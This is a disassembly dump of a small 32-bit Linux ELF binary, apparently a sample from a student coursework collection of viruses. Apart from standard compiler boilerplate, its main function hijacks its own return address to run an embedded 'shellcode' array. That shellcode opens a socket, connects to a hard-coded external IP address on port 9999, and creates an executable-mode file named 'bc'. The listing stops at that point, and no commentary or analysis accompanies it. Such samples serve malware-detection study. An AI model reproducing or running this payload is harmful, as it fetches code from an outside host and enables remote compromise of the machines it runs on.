
/home/stas/Coursach/Выборки/compiled/viruses/13337:     формат файла elf32-i386


Дизассемблирование раздела .interp:

08048154 <.interp>:
 8048154:	2f                   	das    
 8048155:	6c                   	insb   (%dx),%es:(%edi)
 8048156:	69 62 2f 6c 64 2d 6c 	imul   $0x6c2d646c,0x2f(%edx),%esp
 804815d:	69 6e 75 78 2e 73 6f 	imul   $0x6f732e78,0x75(%esi),%ebp
 8048164:	2e 32 00             	xor    %cs:(%eax),%al

Дизассемблирование раздела .note.ABI-tag:

08048168 <.note.ABI-tag>:
 8048168:	04 00                	add    $0x0,%al
 804816a:	00 00                	add    %al,(%eax)
 804816c:	10 00                	adc    %al,(%eax)
 804816e:	00 00                	add    %al,(%eax)
 8048170:	01 00                	add    %eax,(%eax)
 8048172:	00 00                	add    %al,(%eax)
 8048174:	47                   	inc    %edi
 8048175:	4e                   	dec    %esi
 8048176:	55                   	push   %ebp
 8048177:	00 00                	add    %al,(%eax)
 8048179:	00 00                	add    %al,(%eax)
 804817b:	00 02                	add    %al,(%edx)
 804817d:	00 00                	add    %al,(%eax)
 804817f:	00 06                	add    %al,(%esi)
 8048181:	00 00                	add    %al,(%eax)
 8048183:	00 18                	add    %bl,(%eax)
 8048185:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .note.gnu.build-id:

08048188 <.note.gnu.build-id>:
 8048188:	04 00                	add    $0x0,%al
 804818a:	00 00                	add    %al,(%eax)
 804818c:	14 00                	adc    $0x0,%al
 804818e:	00 00                	add    %al,(%eax)
 8048190:	03 00                	add    (%eax),%eax
 8048192:	00 00                	add    %al,(%eax)
 8048194:	47                   	inc    %edi
 8048195:	4e                   	dec    %esi
 8048196:	55                   	push   %ebp
 8048197:	00 4b de             	add    %cl,-0x22(%ebx)
 804819a:	28 24 00             	sub    %ah,(%eax,%eax,1)
 804819d:	dd 5e 59             	fstpl  0x59(%esi)
 80481a0:	a2 40 ef 7e 42       	mov    %al,0x427eef40
 80481a5:	e1 f9                	loope  80481a0 <_init-0xf4>
 80481a7:	be 61 55 b0 7e       	mov    $0x7eb05561,%esi

Дизассемблирование раздела .gnu.hash:

080481ac <.gnu.hash>:
 80481ac:	02 00                	add    (%eax),%al
 80481ae:	00 00                	add    %al,(%eax)
 80481b0:	03 00                	add    (%eax),%eax
 80481b2:	00 00                	add    %al,(%eax)
 80481b4:	01 00                	add    %eax,(%eax)
 80481b6:	00 00                	add    %al,(%eax)
 80481b8:	05 00 00 00 00       	add    $0x0,%eax
 80481bd:	20 00                	and    %al,(%eax)
 80481bf:	20 00                	and    %al,(%eax)
 80481c1:	00 00                	add    %al,(%eax)
 80481c3:	00 03                	add    %al,(%ebx)
 80481c5:	00 00                	add    %al,(%eax)
 80481c7:	00                   	.byte 0x0
 80481c8:	ad                   	lods   %ds:(%esi),%eax
 80481c9:	4b                   	dec    %ebx
 80481ca:	e3 c0                	jecxz  804818c <_init-0x108>

Дизассемблирование раздела .dynsym:

080481cc <.dynsym>:
	...
 80481dc:	2c 00                	sub    $0x0,%al
	...
 80481e6:	00 00                	add    %al,(%eax)
 80481e8:	20 00                	and    %al,(%eax)
 80481ea:	00 00                	add    %al,(%eax)
 80481ec:	1a 00                	sbb    (%eax),%al
	...
 80481f6:	00 00                	add    %al,(%eax)
 80481f8:	12 00                	adc    (%eax),%al
 80481fa:	00 00                	add    %al,(%eax)
 80481fc:	0b 00                	or     (%eax),%eax
 80481fe:	00 00                	add    %al,(%eax)
 8048200:	ac                   	lods   %ds:(%esi),%al
 8048201:	84 04 08             	test   %al,(%eax,%ecx,1)
 8048204:	04 00                	add    $0x0,%al
 8048206:	00 00                	add    %al,(%eax)
 8048208:	11 00                	adc    %eax,(%eax)
 804820a:	0f                   	.byte 0xf
	...

Дизассемблирование раздела .dynstr:

0804820c <.dynstr>:
 804820c:	00 6c 69 62          	add    %ch,0x62(%ecx,%ebp,2)
 8048210:	63 2e                	arpl   %bp,(%esi)
 8048212:	73 6f                	jae    8048283 <_init-0x11>
 8048214:	2e 36 00 5f 49       	cs add %bl,%cs:%ss:0x49(%edi)
 8048219:	4f                   	dec    %edi
 804821a:	5f                   	pop    %edi
 804821b:	73 74                	jae    8048291 <_init-0x3>
 804821d:	64 69 6e 5f 75 73 65 	imul   $0x64657375,%fs:0x5f(%esi),%ebp
 8048224:	64 
 8048225:	00 5f 5f             	add    %bl,0x5f(%edi)
 8048228:	6c                   	insb   (%dx),%es:(%edi)
 8048229:	69 62 63 5f 73 74 61 	imul   $0x6174735f,0x63(%edx),%esp
 8048230:	72 74                	jb     80482a6 <_init+0x12>
 8048232:	5f                   	pop    %edi
 8048233:	6d                   	insl   (%dx),%es:(%edi)
 8048234:	61                   	popa   
 8048235:	69 6e 00 5f 5f 67 6d 	imul   $0x6d675f5f,0x0(%esi),%ebp
 804823c:	6f                   	outsl  %ds:(%esi),(%dx)
 804823d:	6e                   	outsb  %ds:(%esi),(%dx)
 804823e:	5f                   	pop    %edi
 804823f:	73 74                	jae    80482b5 <_init+0x21>
 8048241:	61                   	popa   
 8048242:	72 74                	jb     80482b8 <_init+0x24>
 8048244:	5f                   	pop    %edi
 8048245:	5f                   	pop    %edi
 8048246:	00 47 4c             	add    %al,0x4c(%edi)
 8048249:	49                   	dec    %ecx
 804824a:	42                   	inc    %edx
 804824b:	43                   	inc    %ebx
 804824c:	5f                   	pop    %edi
 804824d:	32 2e                	xor    (%esi),%ch
 804824f:	30 00                	xor    %al,(%eax)

Дизассемблирование раздела .gnu.version:

08048252 <.gnu.version>:
 8048252:	00 00                	add    %al,(%eax)
 8048254:	00 00                	add    %al,(%eax)
 8048256:	02 00                	add    (%eax),%al
 8048258:	01 00                	add    %eax,(%eax)

Дизассемблирование раздела .gnu.version_r:

0804825c <.gnu.version_r>:
 804825c:	01 00                	add    %eax,(%eax)
 804825e:	01 00                	add    %eax,(%eax)
 8048260:	01 00                	add    %eax,(%eax)
 8048262:	00 00                	add    %al,(%eax)
 8048264:	10 00                	adc    %al,(%eax)
 8048266:	00 00                	add    %al,(%eax)
 8048268:	00 00                	add    %al,(%eax)
 804826a:	00 00                	add    %al,(%eax)
 804826c:	10 69 69             	adc    %ch,0x69(%ecx)
 804826f:	0d 00 00 02 00       	or     $0x20000,%eax
 8048274:	3b 00                	cmp    (%eax),%eax
 8048276:	00 00                	add    %al,(%eax)
 8048278:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .rel.dyn:

0804827c <.rel.dyn>:
 804827c:	fc                   	cld    
 804827d:	9f                   	lahf   
 804827e:	04 08                	add    $0x8,%al
 8048280:	06                   	push   %es
 8048281:	01 00                	add    %eax,(%eax)
	...

Дизассемблирование раздела .rel.plt:

08048284 <.rel.plt>:
 8048284:	0c a0                	or     $0xa0,%al
 8048286:	04 08                	add    $0x8,%al
 8048288:	07                   	pop    %es
 8048289:	01 00                	add    %eax,(%eax)
 804828b:	00 10                	add    %dl,(%eax)
 804828d:	a0 04 08 07 02       	mov    0x2070804,%al
	...

Дизассемблирование раздела .init:

08048294 <_init>:
 8048294:	53                   	push   %ebx
 8048295:	83 ec 08             	sub    $0x8,%esp
 8048298:	e8 83 00 00 00       	call   8048320 <__x86.get_pc_thunk.bx>
 804829d:	81 c3 63 1d 00 00    	add    $0x1d63,%ebx
 80482a3:	8b 83 fc ff ff ff    	mov    -0x4(%ebx),%eax
 80482a9:	85 c0                	test   %eax,%eax
 80482ab:	74 05                	je     80482b2 <_init+0x1e>
 80482ad:	e8 1e 00 00 00       	call   80482d0 <__gmon_start__@plt>
 80482b2:	83 c4 08             	add    $0x8,%esp
 80482b5:	5b                   	pop    %ebx
 80482b6:	c3                   	ret    

Дизассемблирование раздела .plt:

080482c0 <__gmon_start__@plt-0x10>:
 80482c0:	ff 35 04 a0 04 08    	pushl  0x804a004
 80482c6:	ff 25 08 a0 04 08    	jmp    *0x804a008
 80482cc:	00 00                	add    %al,(%eax)
	...

080482d0 <__gmon_start__@plt>:
 80482d0:	ff 25 0c a0 04 08    	jmp    *0x804a00c
 80482d6:	68 00 00 00 00       	push   $0x0
 80482db:	e9 e0 ff ff ff       	jmp    80482c0 <_init+0x2c>

080482e0 <__libc_start_main@plt>:
 80482e0:	ff 25 10 a0 04 08    	jmp    *0x804a010
 80482e6:	68 08 00 00 00       	push   $0x8
 80482eb:	e9 d0 ff ff ff       	jmp    80482c0 <_init+0x2c>

Дизассемблирование раздела .text:

080482f0 <_start>:
 80482f0:	31 ed                	xor    %ebp,%ebp
 80482f2:	5e                   	pop    %esi
 80482f3:	89 e1                	mov    %esp,%ecx
 80482f5:	83 e4 f0             	and    $0xfffffff0,%esp
 80482f8:	50                   	push   %eax
 80482f9:	54                   	push   %esp
 80482fa:	52                   	push   %edx
 80482fb:	68 90 84 04 08       	push   $0x8048490
 8048300:	68 20 84 04 08       	push   $0x8048420
 8048305:	51                   	push   %ecx
 8048306:	56                   	push   %esi
 8048307:	68 08 84 04 08       	push   $0x8048408
 804830c:	e8 cf ff ff ff       	call   80482e0 <__libc_start_main@plt>
 8048311:	f4                   	hlt    
 8048312:	66 90                	xchg   %ax,%ax
 8048314:	66 90                	xchg   %ax,%ax
 8048316:	66 90                	xchg   %ax,%ax
 8048318:	66 90                	xchg   %ax,%ax
 804831a:	66 90                	xchg   %ax,%ax
 804831c:	66 90                	xchg   %ax,%ax
 804831e:	66 90                	xchg   %ax,%ax

08048320 <__x86.get_pc_thunk.bx>:
 8048320:	8b 1c 24             	mov    (%esp),%ebx
 8048323:	c3                   	ret    
 8048324:	66 90                	xchg   %ax,%ax
 8048326:	66 90                	xchg   %ax,%ax
 8048328:	66 90                	xchg   %ax,%ax
 804832a:	66 90                	xchg   %ax,%ax
 804832c:	66 90                	xchg   %ax,%ax
 804832e:	66 90                	xchg   %ax,%ax

08048330 <deregister_tm_clones>:
 8048330:	b8 db a0 04 08       	mov    $0x804a0db,%eax
 8048335:	2d d8 a0 04 08       	sub    $0x804a0d8,%eax
 804833a:	83 f8 06             	cmp    $0x6,%eax
 804833d:	77 01                	ja     8048340 <deregister_tm_clones+0x10>
 804833f:	c3                   	ret    
 8048340:	b8 00 00 00 00       	mov    $0x0,%eax
 8048345:	85 c0                	test   %eax,%eax
 8048347:	74 f6                	je     804833f <deregister_tm_clones+0xf>
 8048349:	55                   	push   %ebp
 804834a:	89 e5                	mov    %esp,%ebp
 804834c:	83 ec 18             	sub    $0x18,%esp
 804834f:	c7 04 24 d8 a0 04 08 	movl   $0x804a0d8,(%esp)
 8048356:	ff d0                	call   *%eax
 8048358:	c9                   	leave  
 8048359:	c3                   	ret    
 804835a:	8d b6 00 00 00 00    	lea    0x0(%esi),%esi

08048360 <register_tm_clones>:
 8048360:	b8 d8 a0 04 08       	mov    $0x804a0d8,%eax
 8048365:	2d d8 a0 04 08       	sub    $0x804a0d8,%eax
 804836a:	c1 f8 02             	sar    $0x2,%eax
 804836d:	89 c2                	mov    %eax,%edx
 804836f:	c1 ea 1f             	shr    $0x1f,%edx
 8048372:	01 d0                	add    %edx,%eax
 8048374:	d1 f8                	sar    %eax
 8048376:	75 01                	jne    8048379 <register_tm_clones+0x19>
 8048378:	c3                   	ret    
 8048379:	ba 00 00 00 00       	mov    $0x0,%edx
 804837e:	85 d2                	test   %edx,%edx
 8048380:	74 f6                	je     8048378 <register_tm_clones+0x18>
 8048382:	55                   	push   %ebp
 8048383:	89 e5                	mov    %esp,%ebp
 8048385:	83 ec 18             	sub    $0x18,%esp
 8048388:	89 44 24 04          	mov    %eax,0x4(%esp)
 804838c:	c7 04 24 d8 a0 04 08 	movl   $0x804a0d8,(%esp)
 8048393:	ff d2                	call   *%edx
 8048395:	c9                   	leave  
 8048396:	c3                   	ret    
 8048397:	89 f6                	mov    %esi,%esi
 8048399:	8d bc 27 00 00 00 00 	lea    0x0(%edi,%eiz,1),%edi

080483a0 <__do_global_dtors_aux>:
 80483a0:	80 3d d8 a0 04 08 00 	cmpb   $0x0,0x804a0d8
 80483a7:	75 13                	jne    80483bc <__do_global_dtors_aux+0x1c>
 80483a9:	55                   	push   %ebp
 80483aa:	89 e5                	mov    %esp,%ebp
 80483ac:	83 ec 08             	sub    $0x8,%esp
 80483af:	e8 7c ff ff ff       	call   8048330 <deregister_tm_clones>
 80483b4:	c6 05 d8 a0 04 08 01 	movb   $0x1,0x804a0d8
 80483bb:	c9                   	leave  
 80483bc:	f3 c3                	repz ret 
 80483be:	66 90                	xchg   %ax,%ax

080483c0 <frame_dummy>:
 80483c0:	a1 10 9f 04 08       	mov    0x8049f10,%eax
 80483c5:	85 c0                	test   %eax,%eax
 80483c7:	74 1f                	je     80483e8 <frame_dummy+0x28>
 80483c9:	b8 00 00 00 00       	mov    $0x0,%eax
 80483ce:	85 c0                	test   %eax,%eax
 80483d0:	74 16                	je     80483e8 <frame_dummy+0x28>
 80483d2:	55                   	push   %ebp
 80483d3:	89 e5                	mov    %esp,%ebp
 80483d5:	83 ec 18             	sub    $0x18,%esp
 80483d8:	c7 04 24 10 9f 04 08 	movl   $0x8049f10,(%esp)
 80483df:	ff d0                	call   *%eax
 80483e1:	c9                   	leave  
 80483e2:	e9 79 ff ff ff       	jmp    8048360 <register_tm_clones>
 80483e7:	90                   	nop
 80483e8:	e9 73 ff ff ff       	jmp    8048360 <register_tm_clones>

080483ed <k>:
 80483ed:	55                   	push   %ebp
 80483ee:	89 e5                	mov    %esp,%ebp
 80483f0:	83 ec 10             	sub    $0x10,%esp
 80483f3:	8d 45 fc             	lea    -0x4(%ebp),%eax
 80483f6:	83 c0 08             	add    $0x8,%eax
 80483f9:	89 45 fc             	mov    %eax,-0x4(%ebp)
 80483fc:	8b 45 fc             	mov    -0x4(%ebp),%eax
 80483ff:	ba 40 a0 04 08       	mov    $0x804a040,%edx
 8048404:	89 10                	mov    %edx,(%eax)
 8048406:	c9                   	leave  
 8048407:	c3                   	ret    

08048408 <main>:
 8048408:	55                   	push   %ebp
 8048409:	89 e5                	mov    %esp,%ebp
 804840b:	e8 dd ff ff ff       	call   80483ed <k>
 8048410:	b8 00 00 00 00       	mov    $0x0,%eax
 8048415:	5d                   	pop    %ebp
 8048416:	c3                   	ret    
 8048417:	66 90                	xchg   %ax,%ax
 8048419:	66 90                	xchg   %ax,%ax
 804841b:	66 90                	xchg   %ax,%ax
 804841d:	66 90                	xchg   %ax,%ax
 804841f:	90                   	nop

08048420 <__libc_csu_init>:
 8048420:	55                   	push   %ebp
 8048421:	57                   	push   %edi
 8048422:	31 ff                	xor    %edi,%edi
 8048424:	56                   	push   %esi
 8048425:	53                   	push   %ebx
 8048426:	e8 f5 fe ff ff       	call   8048320 <__x86.get_pc_thunk.bx>
 804842b:	81 c3 d5 1b 00 00    	add    $0x1bd5,%ebx
 8048431:	83 ec 1c             	sub    $0x1c,%esp
 8048434:	8b 6c 24 30          	mov    0x30(%esp),%ebp
 8048438:	8d b3 0c ff ff ff    	lea    -0xf4(%ebx),%esi
 804843e:	e8 51 fe ff ff       	call   8048294 <_init>
 8048443:	8d 83 08 ff ff ff    	lea    -0xf8(%ebx),%eax
 8048449:	29 c6                	sub    %eax,%esi
 804844b:	c1 fe 02             	sar    $0x2,%esi
 804844e:	85 f6                	test   %esi,%esi
 8048450:	74 27                	je     8048479 <__libc_csu_init+0x59>
 8048452:	8d b6 00 00 00 00    	lea    0x0(%esi),%esi
 8048458:	8b 44 24 38          	mov    0x38(%esp),%eax
 804845c:	89 2c 24             	mov    %ebp,(%esp)
 804845f:	89 44 24 08          	mov    %eax,0x8(%esp)
 8048463:	8b 44 24 34          	mov    0x34(%esp),%eax
 8048467:	89 44 24 04          	mov    %eax,0x4(%esp)
 804846b:	ff 94 bb 08 ff ff ff 	call   *-0xf8(%ebx,%edi,4)
 8048472:	83 c7 01             	add    $0x1,%edi
 8048475:	39 f7                	cmp    %esi,%edi
 8048477:	75 df                	jne    8048458 <__libc_csu_init+0x38>
 8048479:	83 c4 1c             	add    $0x1c,%esp
 804847c:	5b                   	pop    %ebx
 804847d:	5e                   	pop    %esi
 804847e:	5f                   	pop    %edi
 804847f:	5d                   	pop    %ebp
 8048480:	c3                   	ret    
 8048481:	eb 0d                	jmp    8048490 <__libc_csu_fini>
 8048483:	90                   	nop
 8048484:	90                   	nop
 8048485:	90                   	nop
 8048486:	90                   	nop
 8048487:	90                   	nop
 8048488:	90                   	nop
 8048489:	90                   	nop
 804848a:	90                   	nop
 804848b:	90                   	nop
 804848c:	90                   	nop
 804848d:	90                   	nop
 804848e:	90                   	nop
 804848f:	90                   	nop

08048490 <__libc_csu_fini>:
 8048490:	f3 c3                	repz ret 

Дизассемблирование раздела .fini:

08048494 <_fini>:
 8048494:	53                   	push   %ebx
 8048495:	83 ec 08             	sub    $0x8,%esp
 8048498:	e8 83 fe ff ff       	call   8048320 <__x86.get_pc_thunk.bx>
 804849d:	81 c3 63 1b 00 00    	add    $0x1b63,%ebx
 80484a3:	83 c4 08             	add    $0x8,%esp
 80484a6:	5b                   	pop    %ebx
 80484a7:	c3                   	ret    

Дизассемблирование раздела .rodata:

080484a8 <_fp_hw>:
 80484a8:	03 00                	add    (%eax),%eax
	...

080484ac <_IO_stdin_used>:
 80484ac:	01 00                	add    %eax,(%eax)
 80484ae:	02 00                	add    (%eax),%al

Дизассемблирование раздела .eh_frame_hdr:

080484b0 <.eh_frame_hdr>:
 80484b0:	01 1b                	add    %ebx,(%ebx)
 80484b2:	03 3b                	add    (%ebx),%edi
 80484b4:	30 00                	xor    %al,(%eax)
 80484b6:	00 00                	add    %al,(%eax)
 80484b8:	05 00 00 00 10       	add    $0x10000000,%eax
 80484bd:	fe                   	(bad)  
 80484be:	ff                   	(bad)  
 80484bf:	ff 4c 00 00          	decl   0x0(%eax,%eax,1)
 80484c3:	00 3d ff ff ff 70    	add    %bh,0x70ffffff
 80484c9:	00 00                	add    %al,(%eax)
 80484cb:	00 58 ff             	add    %bl,-0x1(%eax)
 80484ce:	ff                   	(bad)  
 80484cf:	ff 90 00 00 00 70    	call   *0x70000000(%eax)
 80484d5:	ff                   	(bad)  
 80484d6:	ff                   	(bad)  
 80484d7:	ff b0 00 00 00 e0    	pushl  -0x20000000(%eax)
 80484dd:	ff                   	(bad)  
 80484de:	ff                   	(bad)  
 80484df:	ff                   	(bad)  
 80484e0:	ec                   	in     (%dx),%al
 80484e1:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .eh_frame:

080484e4 <__FRAME_END__-0xcc>:
 80484e4:	14 00                	adc    $0x0,%al
 80484e6:	00 00                	add    %al,(%eax)
 80484e8:	00 00                	add    %al,(%eax)
 80484ea:	00 00                	add    %al,(%eax)
 80484ec:	01 7a 52             	add    %edi,0x52(%edx)
 80484ef:	00 01                	add    %al,(%ecx)
 80484f1:	7c 08                	jl     80484fb <_IO_stdin_used+0x4f>
 80484f3:	01 1b                	add    %ebx,(%ebx)
 80484f5:	0c 04                	or     $0x4,%al
 80484f7:	04 88                	add    $0x88,%al
 80484f9:	01 00                	add    %eax,(%eax)
 80484fb:	00 20                	add    %ah,(%eax)
 80484fd:	00 00                	add    %al,(%eax)
 80484ff:	00 1c 00             	add    %bl,(%eax,%eax,1)
 8048502:	00 00                	add    %al,(%eax)
 8048504:	bc fd ff ff 30       	mov    $0x30fffffd,%esp
 8048509:	00 00                	add    %al,(%eax)
 804850b:	00 00                	add    %al,(%eax)
 804850d:	0e                   	push   %cs
 804850e:	08 46 0e             	or     %al,0xe(%esi)
 8048511:	0c 4a                	or     $0x4a,%al
 8048513:	0f 0b                	ud2    
 8048515:	74 04                	je     804851b <_IO_stdin_used+0x6f>
 8048517:	78 00                	js     8048519 <_IO_stdin_used+0x6d>
 8048519:	3f                   	aas    
 804851a:	1a 3b                	sbb    (%ebx),%bh
 804851c:	2a 32                	sub    (%edx),%dh
 804851e:	24 22                	and    $0x22,%al
 8048520:	1c 00                	sbb    $0x0,%al
 8048522:	00 00                	add    %al,(%eax)
 8048524:	40                   	inc    %eax
 8048525:	00 00                	add    %al,(%eax)
 8048527:	00 c5                	add    %al,%ch
 8048529:	fe                   	(bad)  
 804852a:	ff                   	(bad)  
 804852b:	ff 1b                	lcall  *(%ebx)
 804852d:	00 00                	add    %al,(%eax)
 804852f:	00 00                	add    %al,(%eax)
 8048531:	41                   	inc    %ecx
 8048532:	0e                   	push   %cs
 8048533:	08 85 02 42 0d 05    	or     %al,0x50d4202(%ebp)
 8048539:	57                   	push   %edi
 804853a:	c5 0c 04             	lds    (%esp,%eax,1),%ecx
 804853d:	04 00                	add    $0x0,%al
 804853f:	00 1c 00             	add    %bl,(%eax,%eax,1)
 8048542:	00 00                	add    %al,(%eax)
 8048544:	60                   	pusha  
 8048545:	00 00                	add    %al,(%eax)
 8048547:	00 c0                	add    %al,%al
 8048549:	fe                   	(bad)  
 804854a:	ff                   	(bad)  
 804854b:	ff 0f                	decl   (%edi)
 804854d:	00 00                	add    %al,(%eax)
 804854f:	00 00                	add    %al,(%eax)
 8048551:	41                   	inc    %ecx
 8048552:	0e                   	push   %cs
 8048553:	08 85 02 42 0d 05    	or     %al,0x50d4202(%ebp)
 8048559:	4b                   	dec    %ebx
 804855a:	c5 0c 04             	lds    (%esp,%eax,1),%ecx
 804855d:	04 00                	add    $0x0,%al
 804855f:	00 38                	add    %bh,(%eax)
 8048561:	00 00                	add    %al,(%eax)
 8048563:	00 80 00 00 00 b8    	add    %al,-0x48000000(%eax)
 8048569:	fe                   	(bad)  
 804856a:	ff                   	(bad)  
 804856b:	ff 61 00             	jmp    *0x0(%ecx)
 804856e:	00 00                	add    %al,(%eax)
 8048570:	00 41 0e             	add    %al,0xe(%ecx)
 8048573:	08 85 02 41 0e 0c    	or     %al,0xc0e4102(%ebp)
 8048579:	87 03                	xchg   %eax,(%ebx)
 804857b:	43                   	inc    %ebx
 804857c:	0e                   	push   %cs
 804857d:	10 86 04 41 0e 14    	adc    %al,0x140e4104(%esi)
 8048583:	83 05 4e 0e 30 02 48 	addl   $0x48,0x2300e4e
 804858a:	0e                   	push   %cs
 804858b:	14 41                	adc    $0x41,%al
 804858d:	c3                   	ret    
 804858e:	0e                   	push   %cs
 804858f:	10 41 c6             	adc    %al,-0x3a(%ecx)
 8048592:	0e                   	push   %cs
 8048593:	0c 41                	or     $0x41,%al
 8048595:	c7                   	(bad)  
 8048596:	0e                   	push   %cs
 8048597:	08 41 c5             	or     %al,-0x3b(%ecx)
 804859a:	0e                   	push   %cs
 804859b:	04 10                	add    $0x10,%al
 804859d:	00 00                	add    %al,(%eax)
 804859f:	00 bc 00 00 00 ec fe 	add    %bh,-0x1140000(%eax,%eax,1)
 80485a6:	ff                   	(bad)  
 80485a7:	ff 02                	incl   (%edx)
 80485a9:	00 00                	add    %al,(%eax)
 80485ab:	00 00                	add    %al,(%eax)
 80485ad:	00 00                	add    %al,(%eax)
	...

080485b0 <__FRAME_END__>:
 80485b0:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .init_array:

08049f08 <__frame_dummy_init_array_entry>:
 8049f08:	c0                   	.byte 0xc0
 8049f09:	83                   	.byte 0x83
 8049f0a:	04 08                	add    $0x8,%al

Дизассемблирование раздела .fini_array:

08049f0c <__do_global_dtors_aux_fini_array_entry>:
 8049f0c:	a0                   	.byte 0xa0
 8049f0d:	83                   	.byte 0x83
 8049f0e:	04 08                	add    $0x8,%al

Дизассемблирование раздела .jcr:

08049f10 <__JCR_END__>:
 8049f10:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .dynamic:

08049f14 <_DYNAMIC>:
 8049f14:	01 00                	add    %eax,(%eax)
 8049f16:	00 00                	add    %al,(%eax)
 8049f18:	01 00                	add    %eax,(%eax)
 8049f1a:	00 00                	add    %al,(%eax)
 8049f1c:	0c 00                	or     $0x0,%al
 8049f1e:	00 00                	add    %al,(%eax)
 8049f20:	94                   	xchg   %eax,%esp
 8049f21:	82                   	(bad)  
 8049f22:	04 08                	add    $0x8,%al
 8049f24:	0d 00 00 00 94       	or     $0x94000000,%eax
 8049f29:	84 04 08             	test   %al,(%eax,%ecx,1)
 8049f2c:	19 00                	sbb    %eax,(%eax)
 8049f2e:	00 00                	add    %al,(%eax)
 8049f30:	08 9f 04 08 1b 00    	or     %bl,0x1b0804(%edi)
 8049f36:	00 00                	add    %al,(%eax)
 8049f38:	04 00                	add    $0x0,%al
 8049f3a:	00 00                	add    %al,(%eax)
 8049f3c:	1a 00                	sbb    (%eax),%al
 8049f3e:	00 00                	add    %al,(%eax)
 8049f40:	0c 9f                	or     $0x9f,%al
 8049f42:	04 08                	add    $0x8,%al
 8049f44:	1c 00                	sbb    $0x0,%al
 8049f46:	00 00                	add    %al,(%eax)
 8049f48:	04 00                	add    $0x0,%al
 8049f4a:	00 00                	add    %al,(%eax)
 8049f4c:	f5                   	cmc    
 8049f4d:	fe                   	(bad)  
 8049f4e:	ff 6f ac             	ljmp   *-0x54(%edi)
 8049f51:	81 04 08 05 00 00 00 	addl   $0x5,(%eax,%ecx,1)
 8049f58:	0c 82                	or     $0x82,%al
 8049f5a:	04 08                	add    $0x8,%al
 8049f5c:	06                   	push   %es
 8049f5d:	00 00                	add    %al,(%eax)
 8049f5f:	00 cc                	add    %cl,%ah
 8049f61:	81 04 08 0a 00 00 00 	addl   $0xa,(%eax,%ecx,1)
 8049f68:	45                   	inc    %ebp
 8049f69:	00 00                	add    %al,(%eax)
 8049f6b:	00 0b                	add    %cl,(%ebx)
 8049f6d:	00 00                	add    %al,(%eax)
 8049f6f:	00 10                	add    %dl,(%eax)
 8049f71:	00 00                	add    %al,(%eax)
 8049f73:	00 15 00 00 00 00    	add    %dl,0x0
 8049f79:	00 00                	add    %al,(%eax)
 8049f7b:	00 03                	add    %al,(%ebx)
 8049f7d:	00 00                	add    %al,(%eax)
 8049f7f:	00 00                	add    %al,(%eax)
 8049f81:	a0 04 08 02 00       	mov    0x20804,%al
 8049f86:	00 00                	add    %al,(%eax)
 8049f88:	10 00                	adc    %al,(%eax)
 8049f8a:	00 00                	add    %al,(%eax)
 8049f8c:	14 00                	adc    $0x0,%al
 8049f8e:	00 00                	add    %al,(%eax)
 8049f90:	11 00                	adc    %eax,(%eax)
 8049f92:	00 00                	add    %al,(%eax)
 8049f94:	17                   	pop    %ss
 8049f95:	00 00                	add    %al,(%eax)
 8049f97:	00 84 82 04 08 11 00 	add    %al,0x110804(%edx,%eax,4)
 8049f9e:	00 00                	add    %al,(%eax)
 8049fa0:	7c 82                	jl     8049f24 <_DYNAMIC+0x10>
 8049fa2:	04 08                	add    $0x8,%al
 8049fa4:	12 00                	adc    (%eax),%al
 8049fa6:	00 00                	add    %al,(%eax)
 8049fa8:	08 00                	or     %al,(%eax)
 8049faa:	00 00                	add    %al,(%eax)
 8049fac:	13 00                	adc    (%eax),%eax
 8049fae:	00 00                	add    %al,(%eax)
 8049fb0:	08 00                	or     %al,(%eax)
 8049fb2:	00 00                	add    %al,(%eax)
 8049fb4:	fe                   	(bad)  
 8049fb5:	ff                   	(bad)  
 8049fb6:	ff 6f 5c             	ljmp   *0x5c(%edi)
 8049fb9:	82                   	(bad)  
 8049fba:	04 08                	add    $0x8,%al
 8049fbc:	ff                   	(bad)  
 8049fbd:	ff                   	(bad)  
 8049fbe:	ff 6f 01             	ljmp   *0x1(%edi)
 8049fc1:	00 00                	add    %al,(%eax)
 8049fc3:	00 f0                	add    %dh,%al
 8049fc5:	ff                   	(bad)  
 8049fc6:	ff 6f 52             	ljmp   *0x52(%edi)
 8049fc9:	82                   	(bad)  
 8049fca:	04 08                	add    $0x8,%al
	...

Дизассемблирование раздела .got:

08049ffc <.got>:
 8049ffc:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .got.plt:

0804a000 <_GLOBAL_OFFSET_TABLE_>:
 804a000:	14 9f                	adc    $0x9f,%al
 804a002:	04 08                	add    $0x8,%al
	...
 804a00c:	d6                   	(bad)  
 804a00d:	82                   	(bad)  
 804a00e:	04 08                	add    $0x8,%al
 804a010:	e6 82                	out    %al,$0x82
 804a012:	04 08                	add    $0x8,%al

Дизассемблирование раздела .data:

0804a020 <__data_start>:
 804a020:	00 00                	add    %al,(%eax)
	...

0804a024 <__dso_handle>:
	...

0804a040 <shellcode>:
 804a040:	31 c9                	xor    %ecx,%ecx
 804a042:	f7 e1                	mul    %ecx
 804a044:	31 db                	xor    %ebx,%ebx
 804a046:	99                   	cltd   
 804a047:	50                   	push   %eax
 804a048:	6a 01                	push   $0x1
 804a04a:	6a 02                	push   $0x2
 804a04c:	89 e1                	mov    %esp,%ecx
 804a04e:	43                   	inc    %ebx
 804a04f:	b0 66                	mov    $0x66,%al
 804a051:	cd 80                	int    $0x80
 804a053:	89 c7                	mov    %eax,%edi
 804a055:	52                   	push   %edx
 804a056:	68 8c 73 35 23       	push   $0x2335738c
 804a05b:	66 68 27 0f          	pushw  $0xf27
 804a05f:	b2 02                	mov    $0x2,%dl
 804a061:	66 52                	push   %dx
 804a063:	89 e1                	mov    %esp,%ecx
 804a065:	6a 10                	push   $0x10
 804a067:	51                   	push   %ecx
 804a068:	57                   	push   %edi
 804a069:	89 e1                	mov    %esp,%ecx
 804a06b:	b3 03                	mov    $0x3,%bl
 804a06d:	b0 66                	mov    $0x66,%al
 804a06f:	cd 80                	int    $0x80
 804a071:	31 db                	xor    %ebx,%ebx
 804a073:	31 c9                	xor    %ecx,%ecx
 804a075:	51                   	push   %ecx
 804a076:	66 68 63 62          	pushw  $0x6263
 804a07a:	89 e3                	mov    %esp,%ebx
 804a07c:	66 b9 42 02          	mov    $0x242,%cx
 804a080:	66 ba c0 01          	mov    $0x1c0,%dx
 804a084:	b0 05                	mov    $0x5,%al
 804a086:	cd 80                	int    $0x80
